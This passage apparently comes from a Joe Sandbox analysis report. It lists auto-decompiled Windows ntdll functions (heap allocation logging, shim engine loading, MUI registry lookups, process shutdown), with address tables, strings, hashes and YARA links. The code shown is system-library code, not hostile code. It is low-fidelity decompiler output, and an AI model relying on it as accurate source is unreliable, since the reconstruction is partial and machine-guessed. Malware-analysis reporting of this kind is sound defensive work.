								E34E4B910("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t191 - 0x24));
								goto L32;
							} else {
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E34E4B910();
								} else {
									E34E4B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t191 + 8));
								E34E4B910("Just allocated block at %p for %Ix bytes\n",  *0x34f447c0);
								L32:
								_t116 =  *[fs:0x30];
								__eflags =  *((char*)(_t116 + 2));
								if( *((char*)(_t116 + 2)) != 0) {
									 *0x34f447a1 = 1;
									 *0x34f44100 = 0;
									asm("int3");
									 *0x34f447a1 = 0;
								}
								goto L47;
							}
						}
					}
				} else {
					_t190 =  *0x34f43748; // 0x0
					 *0x34f491e0(__ecx, __edx,  *(_t191 + 8));
					_t89 =  *_t190();
					L48:
					 *[fs:0x0] =  *((intOrPtr*)(_t191 - 0x10));
					return _t89;
				}
			}

0x34eff0a5
0x34eff0a7
0x34eff0ac
0x34eff0b3
0x34eff0b5
0x34eff0ba
0x34eff0bd
0x34eff0c7
0x34eff0e3
0x34eff0e6
0x34eff0f4
0x34eff0f9
0x34eff0fb
0x34eff3d2
0x34eff3d2
0x34eff3d5
0x34eff3d5
0x34eff3d8
0x34eff3df
0x34eff3e4
0x00000000
0x34eff3e4
0x34eff104
0x34eff106
0x34eff10b
0x34eff111
0x34eff114
0x34eff117
0x34eff119
0x34eff11c
0x34eff11e
0x34eff11e
0x34eff12e
0x34eff134
0x34eff137
0x34eff13b
0x34eff13b
0x34eff13c
0x34eff13f
0x34eff142
0x34eff144
0x34eff350
0x34eff350
0x34eff356
0x34eff359
0x34eff378
0x34eff37d
0x34eff35b
0x34eff370
0x34eff375
0x34eff383
0x34eff38e
0x00000000
0x34eff14a
0x34eff14a
0x34eff14d
0x00000000
0x00000000
0x34eff153
0x34eff156
0x34eff15e
0x34eff163
0x34eff16a
0x34eff16a
0x34eff170
0x34eff170
0x34eff177
0x34eff186
0x34eff188
0x34eff18b
0x34eff18f
0x34eff194
0x34eff196
0x00000000
0x34eff19c
0x34eff19c
0x34eff19f
0x34eff1a3
0x34eff1ac
0x34eff1ac
0x34eff1ac
0x34eff1ae
0x34eff1b0
0x34eff1b3
0x34eff1b6
0x34eff1bb
0x34eff1c5
0x34eff1c8
0x34eff1ca
0x34eff1cb
0x34eff1cf
0x34eff1cf
0x34eff1c8
0x34eff1d4
0x34eff1d8
0x34eff208
0x34eff20b
0x34eff20e
0x34eff1da
0x34eff1dc
0x34eff1e1
0x34eff1e6
0x34eff1ed
0x34eff1ff
0x34eff1ef
0x34eff1f0
0x34eff1f5
0x34eff1f8
0x34eff1fb
0x34eff1fb
0x34eff202
0x34eff202
0x34eff202
0x34eff211
0x34eff214
0x34eff218
0x34eff21b
0x34eff227
0x34eff22d
0x34eff22d
0x34eff22d
0x34eff22f
0x34eff236
0x34eff238
0x34eff23c
0x34eff23c
0x34eff244
0x34eff24a
0x34eff250
0x34eff2be
0x34eff2c1
0x34eff2c4
0x34eff2c9
0x00000000
0x00000000
0x34eff2cf
0x34eff2d2
0x34eff2d5
0x00000000
0x00000000
0x34eff2db
0x34eff2e2
0x00000000
0x00000000
0x34eff2ec
0x34eff2f3
0x00000000
0x00000000
0x34eff2f9
0x34eff2ff
0x34eff302
0x34eff321
0x34eff326
0x34eff304
0x34eff319
0x34eff31e
0x34eff337
0x34eff338
0x34eff343
0x00000000
0x34eff252
0x34eff252
0x34eff255
0x34eff274
0x34eff279
0x34eff257
0x34eff26c
0x34eff271
0x34eff27f
0x34eff28d
0x34eff295
0x34eff295
0x34eff29b
0x34eff29f
0x34eff2a5
0x34eff2ac
0x34eff2b2
0x34eff2b3
0x34eff2b3
0x00000000
0x34eff29f
0x34eff250
0x34eff196
0x34eff0c9
0x34eff0ce
0x34eff0d6
0x34eff0dc
0x34eff3e7
0x34eff3ea
0x34eff3f6
0x34eff3f6

APIs

RtlDebugPrintTimes.NTDLL ref: 34EFF0D6

Strings

HEAP: , xrefs: 34EFF274, 34EFF321, 34EFF378
HEAP[%wZ]: , xrefs: 34EFF267, 34EFF314, 34EFF36B
Just allocated block at %p for %Ix bytes, xrefs: 34EFF288
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 34EFF389
RtlAllocateHeap, xrefs: 34EFF0ED
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 34EFF33E

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: 8c9595075468b44b8df97bf29e91c6ca1b3fd63a83204901009b4defd3113205
Instruction ID: 6836ee64036b00cc80944f3c057c48fe4f6f397e92a8f21bdacaaebfbc8dde0b
Opcode Fuzzy Hash: 8c9595075468b44b8df97bf29e91c6ca1b3fd63a83204901009b4defd3113205
Instruction Fuzzy Hash: D3912336A01644EFEB01CFA4D840AADBBF2FF49314F49854EE444AB352CB369941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 34E4640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150
timeCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E34E4640D(void* __ecx) {
				signed int _v8;
				void* _v12;
				void* _v536;
				void* _v548;
				char _v780;
				char* _v784;
				char _v788;
				char _v792;
				intOrPtr _v804;
				char _v868;
				char* _v872;
				short _v874;
				char _v876;
				void* _v880;
				char _v892;
				void* _v896;
				void* _v900;
				void* _v904;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t48;
				short _t49;
				void* _t52;
				signed char _t61;
				void* _t67;
				intOrPtr _t71;
				void* _t81;
				signed char _t85;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				void* _t109;

				_t108 = (_t106 & 0xfffffff8) - 0x374;
				_v8 =  *0x34f4b370 ^ _t108;
				_t48 = 0x16;
				_v876 = _t48;
				_t96 =  &_v876;
				_t49 = 0x18;
				_v874 = _t49;
				_t99 = __ecx;
				_v872 = L"apphelp.dll";
				_v784 =  &_v780;
				_v788 = 0x1000000;
				_v780 = 0;
				_t52 = E34E46C11( &_v788,  &_v876, _t109);
				if(_t52 < 0) {
					_t85 =  *0x34f437c0; // 0x0
					__eflags = _t85 & 0x00000003;
					if((_t85 & 0x00000003) == 0) {
						L12:
						__eflags = _t85 & 0x00000010;
						L15:
						if(__eflags != 0) {
							asm("int3");
						}
						L6:
						_t53 =  &_v780;
						if( &_v780 != _v784) {
							_t53 = E34E4BA80(_v784);
						}
						_pop(_t100);
						_pop(_t102);
						_pop(_t81);
						return L34E94B50(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
					}
					_push(_t52);
					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
					_push(0);
					_push("LdrpInitShimEngine");
					_push(0xa35);
					L11:
					_push("minkernel\\ntdll\\ldrinit.c");
					E34ECE692();
					_t85 =  *0x34f437c0; // 0x0
					_t108 = _t108 + 0x18;
					goto L12;
				}
				E34E6E8A6(0, 0x4001,  &_v868);
				_t96 =  &_v872;
				_t103 = L34E46B45( &_v792,  &_v872, 0,  &_v892);
				if(_v804 != 0) {
					E34E7E7E0( &_v792, _v868);
				}
				_t112 = _t103;
				if(_t103 < 0) {
					_t61 =  *0x34f437c0; // 0x0
					__eflags = _t61 & 0x00000003;
					if((_t61 & 0x00000003) != 0) {
						E34ECE692("minkernel\\ntdll\\ldrinit.c", 0xa48, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
						_t61 =  *0x34f437c0; // 0x0
						_t108 = _t108 + 0x18;
					}
					__eflags = _t61 & 0x00000010;
					goto L15;
				} else {
					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
					 *0x34f45d64 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
					E34E87DF6( *((intOrPtr*)(_t108 + 0xc)));
					E34E6D3E1(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
					_t67 = E34E46868( *((intOrPtr*)(_t108 + 0xc)), _t96, _t112);
					if(_t67 < 0) {
						_t85 =  *0x34f437c0; // 0x0
						__eflags = _t85 & 0x00000003;
						if((_t85 & 0x00000003) == 0) {
							goto L12;
						}
						_push(_t67);
						_push("Getting the shim engine exports failed with status 0x%08lx\n");
						_push(0);
						_push("LdrpInitShimEngine");
						_push(0xa56);
						goto L11;
					}
					_t104 =  *0x34f49208; // 0x0
					_v872 = _t108 + 0x178;
					_v876 = 0x2000000;
					_t96 =  *0x7ffe0330;
					_t71 =  *0x34f45b24; // 0x4c12ce0
					asm("ror esi, cl");
					 *0x34f491e0( &_v876, _t71 + 0x24, _t99, 0x20);
					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
						E34E46565( *((intOrPtr*)(_t108 + 0x14)));
						if( *((intOrPtr*)(_t108 + 0x14)) != _t108 + 0x178) {
							L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t108 + 0x14)));
						}
					}
					goto L6;
				}
			}

0x34e46415
0x34e46422
0x34e4642e
0x34e4642f
0x34e46434
0x34e4643a
0x34e4643b
0x34e46440
0x34e46446
0x34e4644e
0x34e46458
0x34e46460
0x34e46465
0x34e4646c
0x34ea9770
0x34ea9776
0x34ea9779
0x34ea97b3
0x34ea97b3
0x34ea97dd
0x34ea97dd
0x34ea97e3
0x34ea97e3
0x34e46542
0x34e46542
0x34e4654a
0x34ea982b
0x34ea982b
0x34e46557
0x34e46558
0x34e46559
0x34e46564
0x34e46564
0x34ea977b
0x34ea977c
0x34ea9781
0x34ea9783
0x34ea9788
0x34ea97a0
0x34ea97a0
0x34ea97a5
0x34ea97aa
0x34ea97b0
0x00000000
0x34ea97b0
0x34e4647e
0x34e4648b
0x34e46498
0x34e4649e
0x34ea97ed
0x34ea97ed
0x34e464a4
0x34e464a6
0x34ea97f7
0x34ea97fc
0x34ea97fe
0x34ea97ce
0x34ea97d3
0x34ea97d8
0x34ea97d8
0x34ea97db
0x00000000
0x34e464ac
0x34e464b0
0x34e464be
0x34e464c3
0x34e464cc
0x34e464d1
0x34e464d8
0x34ea9802
0x34ea9808
0x34ea980b
0x00000000
0x00000000
0x34ea978f
0x34ea9790
0x34ea9795
0x34ea9796
0x34ea979b
0x00000000
0x34ea979b
0x34e464de
0x34e464eb
0x34e464f1
0x34e464f9
0x34e46507
0x34e46510
0x34e4651c
0x34e46526
0x34e4652c
0x34e4653c
0x34ea981d
0x34ea981d
0x34e4653c
0x00000000
0x34e46526

APIs

RtlDebugPrintTimes.NTDLL ref: 34E4651C

Part of subcall function 34E46565: RtlDebugPrintTimes.NTDLL ref: 34E46614
Part of subcall function 34E46565: RtlDebugPrintTimes.NTDLL ref: 34E4665F

Strings

minkernel\ntdll\ldrinit.c, xrefs: 34EA97A0, 34EA97C9
Getting the shim engine exports failed with status 0x%08lx, xrefs: 34EA9790
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 34EA97B9
LdrpInitShimEngine, xrefs: 34EA9783, 34EA9796, 34EA97BF
apphelp.dll, xrefs: 34E46446
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 34EA977C

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: cad7486644bd2baf89ec7e56f38b72abc9c28863dc070b27b6622ae4db75f8e2
Instruction ID: 97d79b67e7ce3613953183351e2dbbf639b683ee9de7aff0538c32fd7279c845
Opcode Fuzzy Hash: cad7486644bd2baf89ec7e56f38b72abc9c28863dc070b27b6622ae4db75f8e2
Instruction Fuzzy Hash: 7F51AD716183009FE325CF24E890FAB77E8EF94758F44491DF595AB2A0DA34D904CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 34E4D02D Relevance: 11.5, Strings: 9, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E34E4D02D(void* __ecx, intOrPtr* __edx, intOrPtr _a4) {
				char* _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				char* _v100;
				intOrPtr _v104;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char* _v124;
				signed int _v128;
				char _v132;
				char _v140;
				signed int _v144;
				char _v145;
				char _v148;
				signed int _v152;
				void* _v156;
				void* _v157;
				signed int _v160;
				void* _v161;
				signed int _v164;
				signed int _v168;
				void* _v172;
				void* _v180;
				void* _v188;
				intOrPtr _t111;
				void* _t128;
				void* _t160;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr* _t179;
				void* _t182;
				char _t184;
				signed int _t185;
				void* _t187;
				void* _t196;

				_t187 = (_t185 & 0xfffffff8) - 0x9c;
				_t160 = __ecx;
				_t179 = __edx;
				_v128 = 0;
				_v160 = 0;
				_v144 = 0;
				_v152 = 0;
				if(__edx == 0 || _a4 == 0) {
					_t182 = 0xc000000d;
					goto L11;
				} else {
					_v128 =  *__edx;
					E34E95050(__ecx,  &_v140, L"\\Registry\\Machine\\Software\\Policies\\Microsoft\\MUI\\Settings");
					_t184 = 0x18;
					_v132 = _t184;
					_v124 =  &_v148;
					_v128 = 0;
					_push( &_v132);
					_push(0x20019);
					_v120 = 0x40;
					_push( &_v168);
					_v116 = 0;
					_v112 = 0;
					if(E34E92AB0() >= 0) {
						_t182 = E34F0ADD6(_v160, _a4,  &_v145,  &_v132);
						if(_t182 >= 0) {
							L11:
							if(_v160 != 0) {
								_push(_v160);
								E34E92A80();
							}
							if(_v144 != 0) {
								_push(_v144);
								E34E92A80();
							}
							if(_v152 != 0) {
								_push(_v152);
								E34E92A80();
							}
							if(_t182 < 0) {
								if(_t179 == 0) {
									goto L19;
								}
								_t162 = _v128;
								if( *_t179 == _t162) {
									goto L19;
								}
								if( *_t179 != 0) {
									L34E63BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t179);
								}
								goto L44;
							} else {
								if( *_t179 != 0) {
									L19:
									return _t182;
								}
								_t111 = E34E4DAA8(1);
								 *_t179 = _t111;
								if(_t111 == 0) {
									_t162 = _v128;
									_t182 = 0xc0000017;
									L44:
									 *_t179 = _t162;
								}
								goto L19;
							}
						}
						if(_t160 == 8) {
							 *((char*)(_t187 + 0x13)) = 0;
							if(E34F0AD61(_v160, _t187 + 0x13) == 0 &&  *((char*)(_t187 + 0x13)) == 1) {
								_t160 = 4;
							}
						}
						_push(_v160);
						E34E92A80();
						_v164 = _v164 & 0x00000000;
						_t184 = 0x18;
					}
					_t170 = 0x2000000;
					if(E34E4D736(0x2000000,  &_v152) < 0) {
						_v152 = _v152 & 0x00000000;
					}
					if(_t160 != 8) {
						if(_t160 != 4) {
							goto L25;
						}
						if(_v152 == 0) {
							_t128 = 0xc0000034;
						} else {
							E34E95050(_t170,  &_v140, L"Control Panel\\Desktop\\MuiCached\\MachineLanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v44 = _v44 & 0x00000000;
							_v40 = _v40 & 0x00000000;
							_v56 = _v160;
							_v52 =  &_v148;
							_push( &_v60);
							_push(0x20019);
							_v60 = _t184;
							_push( &_v168);
							_v48 = 0x40;
							_t128 = E34E92AB0();
						}
						if(_t128 < 0) {
							E34E95050(_t170,  &_v140, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\Settings\\LanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v32 = _v32 & 0x00000000;
							 *(_t187 + 0xa0) =  *(_t187 + 0xa0) & 0x00000000;
							 *(_t187 + 0xa4) =  *(_t187 + 0xa4) & 0x00000000;
							_v28 =  &_v148;
							_push( &_v36);
							_push(0x20019);
							_v36 = _t184;
							_push( &_v168);
							 *((intOrPtr*)(_t187 + 0xa8)) = 0x40;
							_t182 = E34E92AB0();
							if(_t182 < 0) {
								goto L9;
							}
						}
						goto L25;
					} else {
						if(_v152 == 0) {
							L10:
							_t182 = 0;
							goto L11;
						}
						E34E95050(_t170,  &_v140, L"Software\\Policies\\Microsoft\\Control Panel\\Desktop");
						_v92 = _v92 & 0x00000000;
						_v88 = _v88 & 0x00000000;
						_v104 = _v160;
						_t164 = 0x40;
						_v100 =  &_v148;
						_push( &_v108);
						_push(0x20019);
						_v108 = _t184;
						_push( &_v152);
						_v96 = _t164;
						if(E34E92AB0() >= 0) {
							_t170 = _v144;
							_t182 = E34F0ADD6(_v144, _a4,  &_v145,  &_v132);
							if(_t182 >= 0) {
								goto L11;
							}
							_t184 = 0x18;
						}
						E34E95050(_t170,  &_v140, L"Control Panel\\Desktop\\LanguageConfiguration");
						_v168 = _v168 & 0x00000000;
						_v68 = _v68 & 0x00000000;
						_v64 = _v64 & 0x00000000;
						 *((intOrPtr*)(_t187 + 0x64)) = _v160;
						 *((intOrPtr*)(_t187 + 0x68)) =  &_v148;
						_push( &_v84);
						_push(0x20019);
						_v84 = _t184;
						_push( &_v168);
						_v72 = _t164;
						_t182 = E34E92AB0();
						if(_t182 >= 0) {
							L25:
							_t182 = E34E4D9A2(_v160, _t179, _a4);
							goto L11;
						} else {
							_t196 = _t182 - 0xc0000034;
							L9:
							if(_t196 != 0) {
								goto L11;
							}
							goto L10;
						}
					}
				}
			}

0x34e4d035
0x34e4d03f
0x34e4d042
0x34e4d044
0x34e4d048
0x34e4d04c
0x34e4d050
0x34e4d056
0x34eaa5a1
0x00000000
0x34e4d065
0x34e4d067
0x34e4d075
0x34e4d07c
0x34e4d081
0x34e4d085
0x34e4d08f
0x34e4d093
0x34e4d094
0x34e4d09d
0x34e4d0a5
0x34e4d0a6
0x34e4d0aa
0x34e4d0b5
0x34eaa52a
0x34eaa52e
0x34e4d194
0x34e4d199
0x34e4d19b
0x34e4d19f
0x34e4d19f
0x34e4d1a9
0x34eaa5ab
0x34eaa5af
0x34eaa5af
0x34e4d1b4
0x34e4d1b6
0x34e4d1ba
0x34e4d1ba
0x34e4d1c1
0x34eaa5bb
0x00000000
0x00000000
0x34eaa5c1
0x34eaa5c7
0x00000000
0x00000000
0x34eaa5d0
0x34eaa5df
0x34eaa5df
0x00000000
0x34e4d1c7
0x34e4d1ca
0x34e4d1de
0x34e4d1e6
0x34e4d1e6
0x34e4d1cf
0x34e4d1d4
0x34e4d1d8
0x34eaa5e6
0x34eaa5ea
0x34eaa5ef
0x34eaa5ef
0x34eaa5ef
0x00000000
0x34e4d1d8
0x34e4d1c1
0x34eaa537
0x34eaa541
0x34eaa54d
0x34eaa558
0x34eaa558
0x34eaa54d
0x34eaa559
0x34eaa55d
0x34eaa562
0x34eaa569
0x34eaa569
0x34e4d0bf
0x34e4d0cc
0x34eaa56f
0x34eaa56f
0x34e4d0d5
0x34e4d1ec
0x00000000
0x00000000
0x34e4d1fc
0x34e4d2de
0x34e4d202
0x34e4d20c
0x34e4d215
0x34e4d21a
0x34e4d222
0x34e4d22a
0x34e4d232
0x34e4d23d
0x34e4d23e
0x34e4d247
0x34e4d24e
0x34e4d24f
0x34e4d25a
0x34e4d25a
0x34e4d261
0x34e4d26d
0x34e4d272
0x34e4d27b
0x34e4d283
0x34e4d28b
0x34e4d293
0x34e4d2a1
0x34e4d2a2
0x34e4d2ab
0x34e4d2b2
0x34e4d2b3
0x34e4d2c3
0x34e4d2c7
0x00000000
0x34e4d2e5
0x34e4d2c7
0x00000000
0x34e4d0db
0x34e4d0e0
0x34e4d192
0x34e4d192
0x00000000
0x34e4d192
0x34e4d0f0
0x34e4d0f9
0x34e4d0fe
0x34e4d103
0x34e4d10d
0x34e4d10e
0x34e4d116
0x34e4d117
0x34e4d120
0x34e4d124
0x34e4d125
0x34e4d130
0x34eaa580
0x34eaa58f
0x34eaa593
0x00000000
0x00000000
0x34eaa59b
0x34eaa59b
0x34e4d140
0x34e4d149
0x34e4d14e
0x34e4d153
0x34e4d158
0x34e4d160
0x34e4d168
0x34e4d169
0x34e4d172
0x34e4d176
0x34e4d177
0x34e4d180
0x34e4d184
0x34e4d2c9
0x34e4d2d7
0x00000000
0x34e4d18a
0x34e4d18a
0x34e4d190
0x34e4d190
0x00000000
0x00000000
0x00000000
0x34e4d190
0x34e4d184
0x34e4d0d5

Strings

@, xrefs: 34E4D09D
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 34E4D06F
@, xrefs: 34E4D24F
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 34E4D263
h.4, xrefs: 34EAA5D2
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 34E4D202
@, xrefs: 34E4D2B3
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 34E4D0E6
Control Panel\Desktop\LanguageConfiguration, xrefs: 34E4D136

Memory Dump Source

Source File: 00000006.00000002.3051285400.0000000034E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 34E20000, based on PE: true

Associated: 00000006.00000002.3051285400.0000000034F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3051285400.0000000034F4D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_34e20000_SC.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.4
API String ID: 0-1748225372
Opcode ID: 1460f4520bba116321c8e85ecc880e68d86971aba73da7bd8d3577ace7be96af
Instruction ID: 1038bec4842c28c432611add8b61d89a3266ceb6ece163107b3a041ddb7541b8
Opcode Fuzzy Hash: 1460f4520bba116321c8e85ecc880e68d86971aba73da7bd8d3577ace7be96af
Instruction Fuzzy Hash: 8BA16CB2918345DFE321CF51D480B9BB7E8BB84769F014A2EF99896340D778D908CF96

Uniqueness

Uniqueness Score: -1.00%

Function 34E7D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E34E7D6D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				intOrPtr _t70;
				signed int _t78;
				signed char _t79;
				intOrPtr _t85;
				intOrPtr _t88;
				intOrPtr _t97;
				char _t99;
				signed int _t102;
				signed int _t103;
				signed char _t106;
				signed int _t108;
				signed int _t112;
				intOrPtr _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t134;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t143;

				_push(0x68);
				_push(0x34f2c5e8);
				_t68 = L34EA7BE4(__ebx, __edi, __esi);
				_t127 =  *[fs:0x18];
				_t97 =  *((intOrPtr*)(_t127 + 0x30));
				if( *0x34f45da8 != 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
					return _t68;
				}
				_t102 =  *(_t97 + 0x10);
				 *((intOrPtr*)(_t141 - 0x30)) =  *((intOrPtr*)(_t102 + 0x40));
				_t70 =  *((intOrPtr*)(_t102 + 0x44));
				 *((intOrPtr*)(_t141 - 0x2c)) = _t70;
				_t103 =  *(_t97 + 0x10);
				if(( *(_t103 + 8) & 0x00000001) == 0) {
					 *((intOrPtr*)(_t141 - 0x2c)) = _t70 + _t103;
				}
				if(( *0x34f437c0 & 0x00000005) != 0) {
					_push(_t141 - 0x30);
					E34ECE692("minkernel\\ntdll\\ldrinit.c", 0x17f5, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t127 + 0x20)));
					_t143 = _t143 + 0x1c;
				}
				_t74 =  *((intOrPtr*)(_t127 + 0x24));
				 *0x34f45dac =  *((intOrPtr*)(_t127 + 0x24));
				 *0x34f45da8 = 1;
				if( *0x34f465f0 != 0) {
					_t137 =  *0x34f491f8; // 0x0
					asm("ror esi, cl");
					_t138 = _t137 ^  *0x7ffe0330;
					_t103 = _t138;
					 *0x34f491e0(0x20);
					_t74 =  *_t138();
				}
				_t118 =  *((intOrPtr*)(_t127 + 0xfb4));
				if( *((intOrPtr*)(_t127 + 0xfb4)) != 0) {
					_push(1);
					E34E54779(_t74, _t118);
				}
				if(( *0x34f4391c & 0x00000002) == 0) {
					_t78 =  *(_t97 + 0x10);
					__eflags =  *(_t78 + 8) & 0x40000000;
					_t106 = _t103 & 0xffffff00 | ( *(_t78 + 8) & 0x40000000) == 0x00000000;
					__eflags =  *0x34f49234 & 0x00000001;
					_t79 = _t78 & 0xffffff00 | ( *0x34f49234 & 0x00000001) == 0x00000000;
					__eflags = _t79 & _t106;
					if((_t79 & _t106) == 0) {
						goto L7;
					}
					 *((char*)(_t141 - 0x19)) = 1;
					_t99 = 0;
					L15:
					_t85 =  *[fs:0x30];
					__eflags =  *0x34f468c8;
					if( *0x34f468c8 != 0) {
						__eflags =  *((intOrPtr*)(_t85 + 0x18)) - _t99;
						if( *((intOrPtr*)(_t85 + 0x18)) != _t99) {
							E34ED0FC8();
							 *0x34f468c8 = _t99;
						}
					}
					__eflags =  *((char*)(_t141 - 0x19));
					if( *((char*)(_t141 - 0x19)) == 0) {
						E34E7D8F0();
					}
					_t68 = E34E7D898();
					goto L19;
				}
				L7:
				_t99 = 0;
				 *((char*)(_t141 - 0x19)) = 0;
				_t129 =  *0x34f45da0; // 0x4c3e070
				L8:
				if(_t129 != 0x34f45d9c) {
					_t18 = _t129 - 0x10; // 0x4c3e060
					_t122 = _t18;
					 *((intOrPtr*)(_t141 - 0x24)) = _t122;
					_t20 = _t129 + 4; // 0x4c3d570
					_t129 =  *_t20;
					 *((intOrPtr*)(_t141 - 0x20)) = _t129;
					_t22 = _t122 + 0x1c; // 0x76835cd0
					_t88 =  *_t22;
					 *((intOrPtr*)(_t141 - 0x28)) = _t88;
					if(_t88 != 0 && ( *(_t122 + 0x34) & 0x00080000) != 0) {
						 *((intOrPtr*)(_t141 - 0x54)) = 0x24;
						 *((intOrPtr*)(_t141 - 0x50)) = 1;
						_t112 = 7;
						memset(_t141 - 0x4c, 0, _t112 << 2);
						_t143 = _t143 + 0xc;
						_t31 = _t122 + 0x48; // 0x0
						E34E6DC40(_t141 - 0x54,  *_t31);
						 *((intOrPtr*)(_t141 - 4)) = _t99;
						_t134 =  *((intOrPtr*)(_t141 - 0x24));
						_t157 =  *((intOrPtr*)(_t134 + 0x3a)) - _t99;
						if( *((intOrPtr*)(_t134 + 0x3a)) != _t99) {
							E34E6F0A3(_t99, 0, _t134, _t134, 1, __eflags);
						}
						_push(1);
						_push(_t99);
						E34E6DCD1(_t99,  *((intOrPtr*)(_t141 - 0x28)),  *((intOrPtr*)(_t134 + 0x18)), _t134, 1, _t157);
						 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
						_t129 =  *((intOrPtr*)(_t141 - 0x20));
						E34E7D886();
					}
					goto L8;
				}
				_t119 =  *0x34f45b24; // 0x4c12ce0
				__eflags =  *((intOrPtr*)(_t119 + 0x3a)) - _t99;
				if( *((intOrPtr*)(_t119 + 0x3a)) != _t99) {
					 *((intOrPtr*)(_t141 - 0x78)) = 0x24;
					 *((intOrPtr*)(_t141 - 0x74)) = 1;
					_t108 = 7;
					memset(_t141 - 0x70, 0, _t108 << 2);
					_t47 = _t119 + 0x48; // 0x0
					E34E6DC40(_t141 - 0x78,  *_t47);
					 *((intOrPtr*)(_t141 - 4)) = 1;
					_t121 =  *0x34f45b24; // 0x4c12ce0
					E34E6F0A3(_t99, 0, _t121, _t141 - 0x70 + _t108, 1, __eflags);
					 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
					E34E7D88F();
				}
				goto L15;
			}

0x34e7d6d0
0x34e7d6d2
0x34e7d6d7
0x34e7d6dc
0x34e7d6e3
0x34e7d6ed
0x34e7d810
0x34e7d813
0x34e7d81f
0x34e7d81f
0x34e7d6f3
0x34e7d6f9
0x34e7d6fc
0x34e7d6ff
0x34e7d702
0x34e7d709
0x34ebf0c2
0x34ebf0c2
0x34e7d716
0x34ebf0cd
